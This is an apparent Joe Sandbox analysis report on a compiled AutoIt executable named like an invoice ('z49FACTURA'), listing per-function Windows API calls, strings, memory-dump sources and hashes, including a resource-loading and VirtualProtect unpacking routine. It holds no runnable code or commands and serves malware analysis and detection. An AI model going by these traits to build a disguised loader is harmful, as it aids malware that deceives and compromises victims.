                                                                              • Part of subcall function 00ED434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00ED4415
                                                                            Strings
                                                                            • This is a third-party compiled AutoIt script., xrefs: 00F0D279
                                                                            • runas, xrefs: 00F0D33A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                            • API String ID: 529118366-3287110873
                                                                            • Opcode ID: a9986c08b5429f99637436d7246785bd08fc1a0959e0667df1aa4ffc5530682a
                                                                            • Instruction ID: 2b5758d55811e46b5416571133f75483a7cf871cac6aa687bfb6b5499229e39d
                                                                            • Opcode Fuzzy Hash: a9986c08b5429f99637436d7246785bd08fc1a0959e0667df1aa4ffc5530682a
                                                                            • Instruction Fuzzy Hash: 46510870D0824CAEDF12EBB4DC05EEDBBB4EB45750F005067F551B22A2DA709606FB22

                                                                            Control-flow Graph

                                                                            [Control-flow graph of function ed3633 (basic blocks ed3633-ed3764 and f0d06f-f0d16e); the rendered graph is omitted. Blocks call PostQuitMessage, NtdllDefWindowProc_W, SetTimer, RegisterClipboardFormatW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus and the internal routines ee1070, ee1093, f32527, ed44a0, ed443a, ed3114, f27c36, f32d36 and ed434a.]
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00ED36D2
                                                                            • KillTimer.USER32(?,00000001), ref: 00ED36FC
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ED371F
                                                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED372A
                                                                            • CreatePopupMenu.USER32 ref: 00ED373E
                                                                            • PostQuitMessage.USER32(00000000), ref: 00ED374D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 157504867-2362178303
                                                                            • Opcode ID: e15fd036cd7c60a0f52e824ccdbad4d9e01d7463c79dad4e9252a4fa6e110f48
                                                                            • Instruction ID: e126c13b066a10d7e8a37cebad7fda85f9da9a3593cdd7102f549b1ed04b59da
                                                                            • Opcode Fuzzy Hash: e15fd036cd7c60a0f52e824ccdbad4d9e01d7463c79dad4e9252a4fa6e110f48
                                                                            • Instruction Fuzzy Hash: 02412BB1500A09BBDF15AF74EC09BBA3B94EB04701F102127F601B63E2CA719E46B763

                                                                            Control-flow Graph

                                                                            [Control-flow graph of function ed49a0 (basic blocks ed49a0-ed4b35 and f0d767-f0d894); the rendered graph is omitted. Blocks call GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, FreeLibrary and the internal routines ed7667, ed7bcc, ed7d2c, ed7726 and ed4b37.]
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 00ED49CD
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            • GetCurrentProcess.KERNEL32(?,00F5FAEC,00000000,00000000,?), ref: 00ED4A9A
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00ED4AA1
                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00ED4AE7
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00ED4AF2
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00ED4B23
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00ED4B2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 1986165174-0
                                                                            • Opcode ID: 91a354f75afc5fd0700c9ebccf454cdcdd03d60c1dabbf88cacb4d30ac7b217c
                                                                            • Instruction ID: ecc98092b43bb02f533ce0403c167a3addf03800b99bc013aa9e9e77cc26d930
                                                                            • Opcode Fuzzy Hash: 91a354f75afc5fd0700c9ebccf454cdcdd03d60c1dabbf88cacb4d30ac7b217c
                                                                            • Instruction Fuzzy Hash: 1A91C3719897C4DFC731DB6885501AABFF5AF3A300B4859AFD0C7A3B81E230A509E759

                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00ED4E99
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00ED4D8E,?,?,00000000,00000000), ref: 00ED4EB0
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00ED4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00ED4E2F), ref: 00F0D937
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00ED4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00ED4E2F), ref: 00F0D94C
                                                                            • LockResource.KERNEL32(00ED4D8E,?,?,00ED4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00ED4E2F,00000000), ref: 00F0D95F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: bf246876096f3a595cb635bc322313061b6569d81261b17f8ae7d36a6a7bea91
                                                                            • Instruction ID: 568ee854ab60a10dc987e4c06a6dab963d8f0cc152c17f925db2558d9163754d
                                                                            • Opcode Fuzzy Hash: bf246876096f3a595cb635bc322313061b6569d81261b17f8ae7d36a6a7bea91
                                                                            • Instruction Fuzzy Hash: 7911A0B4200704BFD7208B65EC48F677BBAFBC5B12F2042ADF905DA290DB72EC059661

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?), ref: 01027B8A
                                                                            • GetProcAddress.KERNEL32(?,01020FF9), ref: 01027BA8
                                                                            • ExitProcess.KERNEL32(?,01020FF9), ref: 01027BB9
                                                                            • VirtualProtect.KERNELBASE(00ED0000,00001000,00000004,?,00000000), ref: 01027C07
                                                                            • VirtualProtect.KERNELBASE(00ED0000,00001000), ref: 01027C1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                            • String ID:
                                                                            • API String ID: 1996367037-0
                                                                            • Opcode ID: 0888fc5ea049e5a2257388f8e934b2457a7b2e5464d23d15f05baead474ea5c9
                                                                            • Instruction ID: 8a7ebc9f5735ec7c9d19987af6a8995b3d5a558b4aa528b315c3d393c01148ea
                                                                            • Opcode Fuzzy Hash: 0888fc5ea049e5a2257388f8e934b2457a7b2e5464d23d15f05baead474ea5c9
                                                                            • Instruction Fuzzy Hash: 2D511A72A443725BD7228EBCCCC07A5BBE5EBA123471C07B9DAE1C73C6E7A459058760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID:
                                                                            • API String ID: 3964851224-0
                                                                            • Opcode ID: b184f13f1f88126c5841e77851013850f42bad47159e734dc877c674127d9920
                                                                            • Instruction ID: c559046b2e4d7cf259eaf4478ebbf66b501eaa963080d74703dc0cf8ff339b67
                                                                            • Opcode Fuzzy Hash: b184f13f1f88126c5841e77851013850f42bad47159e734dc877c674127d9920
                                                                            • Instruction Fuzzy Hash: D1927C70A083858FD720DF15C480B6AB7E1FF85314F14992DE88AAB352D7B5EC85DB92
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00F0E398), ref: 00F3446A
                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00F3447B
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3448B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: 3cf411d1edd4194d962647e4af14c6aacefb3077df62339913a64ddef706e4d8
                                                                            • Instruction ID: 659d93d385d72bb2a59e247afa32e2f972ce8e4d2dac07d57616a8ad631609c6
                                                                            • Opcode Fuzzy Hash: 3cf411d1edd4194d962647e4af14c6aacefb3077df62339913a64ddef706e4d8
                                                                            • Instruction Fuzzy Hash: 74E0D873810604A75210AB38EC0D4E97B5C9F05336F100765FE35C20E0E7747904B696
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EE0A5B
                                                                            • timeGetTime.WINMM ref: 00EE0D16
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EE0E53
                                                                            • Sleep.KERNEL32(0000000A), ref: 00EE0E61
                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00EE0EFA
                                                                            • DestroyWindow.USER32 ref: 00EE0F06
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EE0F20
                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00F14E83
                                                                            • TranslateMessage.USER32(?), ref: 00F15C60
                                                                            • DispatchMessageW.USER32(?), ref: 00F15C6E
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F15C82
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                            • API String ID: 4212290369-3242690629
                                                                            • Opcode ID: 6075b84c24036ad335bf4e1d5674b03a90e7bdbb74bf6828b1a9d31deb4b2f2a
                                                                            • Instruction ID: c8d579e25d5ea360e30eafef08f32f7c35b8b9662d2797098e92dfd9b48b5dfa
                                                                            • Opcode Fuzzy Hash: 6075b84c24036ad335bf4e1d5674b03a90e7bdbb74bf6828b1a9d31deb4b2f2a
                                                                            • Instruction Fuzzy Hash: 2FB21470608785DFDB24DF24C884BAAB7E0FF84714F14491EE599A72A1C770E8C5EB82

                                                                            APIs
                                                                              • Part of subcall function 00F38F5F: __time64.LIBCMT ref: 00F38F69
                                                                              • Part of subcall function 00ED4EE5: _fseek.LIBCMT ref: 00ED4EFD
                                                                            • __wsplitpath.LIBCMT ref: 00F39234
                                                                              • Part of subcall function 00EF40FB: __wsplitpath_helper.LIBCMT ref: 00EF413B
                                                                            • _wcscpy.LIBCMT ref: 00F39247
                                                                            • _wcscat.LIBCMT ref: 00F3925A
                                                                            • __wsplitpath.LIBCMT ref: 00F3927F
                                                                            • _wcscat.LIBCMT ref: 00F39295
                                                                            • _wcscat.LIBCMT ref: 00F392A8
                                                                              • Part of subcall function 00F38FA5: _memmove.LIBCMT ref: 00F38FDE
                                                                              • Part of subcall function 00F38FA5: _memmove.LIBCMT ref: 00F38FED
                                                                            • _wcscmp.LIBCMT ref: 00F391EF
                                                                              • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39824
                                                                              • Part of subcall function 00F39734: _wcscmp.LIBCMT ref: 00F39837
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F39452
                                                                            • _wcsncpy.LIBCMT ref: 00F394C5
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 00F394FB
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F39511
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39522
                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F39534
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            • Opcode ID: 670161d5c923aa0c2fe297b81d196c8e11b6c05b87540b3ad344608130159aef
                                                                            • Instruction ID: 69c4382914032e12bc90243c346b0ed38482d19182018b7e15f5a603257387ac
                                                                            • Opcode Fuzzy Hash: 670161d5c923aa0c2fe297b81d196c8e11b6c05b87540b3ad344608130159aef
                                                                            • Instruction Fuzzy Hash: 67C14CB1D04219ABDF21DFA4CC85EEEB7BCEF55310F0040AAF609E6251DB709A859F61

                                                                            APIs
                                                                              • Part of subcall function 00ED4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F952F8,?,00ED37AE,?), ref: 00ED4724
                                                                              • Part of subcall function 00EF050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00ED7165), ref: 00EF052D
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00ED71A8
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F0E8C8
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F0E909
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F0E947
                                                                            • _wcscat.LIBCMT ref: 00F0E9A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: 70c364371ac9165f182b6d228153e703148f1b55b95c69f58d811748425f9ed4
                                                                            • Instruction ID: 2bf7aad51b00c15ad5053780fe87ae25728bbc80399de0625e25cbd7988f536f
                                                                            • Opcode Fuzzy Hash: 70c364371ac9165f182b6d228153e703148f1b55b95c69f58d811748425f9ed4
                                                                            • Instruction Fuzzy Hash: FB718D725083059ECB00EF25EC419ABBBE8FF89350F40192FF585D72A1EB719949EB52

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00ED3A50
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00ED3A5F
                                                                            • LoadIconW.USER32(00000063), ref: 00ED3A76
                                                                            • LoadIconW.USER32(000000A4), ref: 00ED3A88
                                                                            • LoadIconW.USER32(000000A2), ref: 00ED3A9A
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00ED3AC0
                                                                            • RegisterClassExW.USER32(?), ref: 00ED3B16
                                                                              • Part of subcall function 00ED3041: GetSysColorBrush.USER32(0000000F), ref: 00ED3074
                                                                              • Part of subcall function 00ED3041: RegisterClassExW.USER32(00000030), ref: 00ED309E
                                                                              • Part of subcall function 00ED3041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED30AF
                                                                              • Part of subcall function 00ED3041: LoadIconW.USER32(000000A9), ref: 00ED30F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 2880975755-4155596026
                                                                            • Opcode ID: f3f72b16d16bd157899ecc90bfbfb6253ef1667997993e196449754af5e692ba
                                                                            • Instruction ID: 06be64372311c4ddf6d0936de577fa4c1e6fc1c5f76f75d121263ee63dcc7035
                                                                            • Opcode Fuzzy Hash: f3f72b16d16bd157899ecc90bfbfb6253ef1667997993e196449754af5e692ba
                                                                            • Instruction Fuzzy Hash: 6F2128B1D0070CAFEB12DFA4EC49B9D7BB4FB08B11F1001ABF604A62A1D3B55654AF94

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                            • API String ID: 1825951767-3513169116
                                                                            • Opcode ID: fe14b60901aca3d1273a3a0acc040f31d7d9f84456d56f5e6535c685cf0c8b3f
                                                                            • Instruction ID: adc706b2f275c6cc8103ef57912234199ff32ebb176e982b7bdc03f83a39e8d6
                                                                            • Opcode Fuzzy Hash: fe14b60901aca3d1273a3a0acc040f31d7d9f84456d56f5e6535c685cf0c8b3f
                                                                            • Instruction Fuzzy Hash: 2BA17F7191021D9ADF05EBA4DC51AEEB7B9FF14310F00242BF815B7292EF749A0ADB61

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00ED3074
                                                                            • RegisterClassExW.USER32(00000030), ref: 00ED309E
                                                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00ED30AF
                                                                            • LoadIconW.USER32(000000A9), ref: 00ED30F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
